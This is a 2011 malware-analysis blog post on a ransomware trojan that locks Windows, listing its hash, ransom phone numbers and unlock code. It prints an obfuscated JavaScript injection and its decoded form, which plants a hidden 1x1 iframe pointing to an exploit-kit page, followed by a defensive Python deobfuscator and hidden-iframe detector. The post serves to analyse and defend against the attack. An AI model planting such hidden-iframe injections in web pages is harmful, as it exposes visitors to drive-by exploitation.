Sunday 16 January 2011

Trojan.Ransom (HomoBlocker)



This trojan blocker (MD5: bbbecfd1ff100a2e70cd163b05de177d) prevents all software execution.
To remove the Trojan (and unlock Windows), infected users need to enter a valid serial number.


Number to Call: 9099010810
Number to Call: 9099010759 (thanks to Gmax for this one)
Number to Call: 9629464469
Number to Call: 9629463283
Number to Call: 9629459917
Code to unlock Windows: DNKEYS

HomoBlocker is a variant of pornoplayer.
HomoBlocker was already analyzed in the past: here (15 Jan 2k11)

Short website analysis ~

"fuck.js" contains:
var _0x11f3=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x63\x6C\x65\x61\x72\x5F\x62\x6C\x6F\x63\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x2F\x6B\x61\x6C\x2F\x61\x6E\x65\x74\x64\x71\x79\x6F\x63\x75\x65\x76\x65\x6D\x63\x33\x2E\x70\x68\x70\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];document[_0x11f3[2]](_0x11f3[1])[_0x11f3[0]]=_0x11f3[3];

When deobfuscated:
document['getElementById']('clear_block')['innerHTML'] = '<iframe src="/kal/anetdqyocuevemc3.php" width="1" height="1" scrolling="no" frameborder="0"></iframe>';

The file "/kal/anetdqyocuevemc3.php" was served by the Phoenix Exploit Kit.
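As an added example (not code from the original post), here is a small Python helper that performs the deobfuscation shown above mechanically: it decodes the hex-escaped string table, substitutes the `_0x11f3[i]` lookups, and then flags any 1x1 iframe the decoded markup injects. The sample input is the fuck.js line quoted above; the function names are my own.

```python
import re

# Constructed test input: the obfuscated one-liner from fuck.js quoted above,
# split across several raw strings so it fits on the page.
SAMPLE = (
    r'var _0x11f3=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",'
    r'"\x63\x6C\x65\x61\x72\x5F\x62\x6C\x6F\x63\x6B",'
    r'"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",'
    r'"\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x2F\x6B\x61\x6C\x2F'
    r'\x61\x6E\x65\x74\x64\x71\x79\x6F\x63\x75\x65\x76\x65\x6D\x63\x33\x2E\x70\x68\x70\x22'
    r'\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22'
    r'\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22'
    r'\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E'
    r'\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];'
    r'document[_0x11f3[2]](_0x11f3[1])[_0x11f3[0]]=_0x11f3[3];'
)

def decode_js_string(body):
    """Resolve \\xNN and \\uNNNN escapes inside a JS string literal body."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})',
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), body)

def parse_string_array(js):
    """Find the `var NAME=[...]` string table and return (NAME, decoded strings)."""
    m = re.search(r'var\s+(\w+)\s*=\s*\[(.*?)\];', js, re.S)
    if not m:
        raise ValueError('no string array found')
    literals = re.findall(r'"((?:[^"\\]|\\.)*)"', m.group(2))
    return m.group(1), [decode_js_string(s) for s in literals]

def deobfuscate(js):
    """Replace every NAME[i] lookup after the table with its decoded literal."""
    name, table = parse_string_array(js)
    rest = js[js.index('];') + 2:]
    return re.sub(re.escape(name) + r'\[(\d+)\]',
                  lambda m: "'" + table[int(m.group(1))] + "'", rest)

def hidden_iframes(text):
    """Return src of every iframe sized 1x1 or smaller (the drive-by pattern seen here)."""
    found = []
    for tag in re.findall(r'<iframe\b[^>]*>', text, re.I):
        src = re.search(r'src="([^"]*)"', tag)
        w = re.search(r'width="(\d+)"', tag)
        h = re.search(r'height="(\d+)"', tag)
        if src and w and h and int(w.group(1)) <= 1 and int(h.group(1)) <= 1:
            found.append(src.group(1))
    return found

if __name__ == '__main__':
    clear = deobfuscate(SAMPLE)
    print(clear)
    print('hidden iframes:', hidden_iframes(clear))
```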
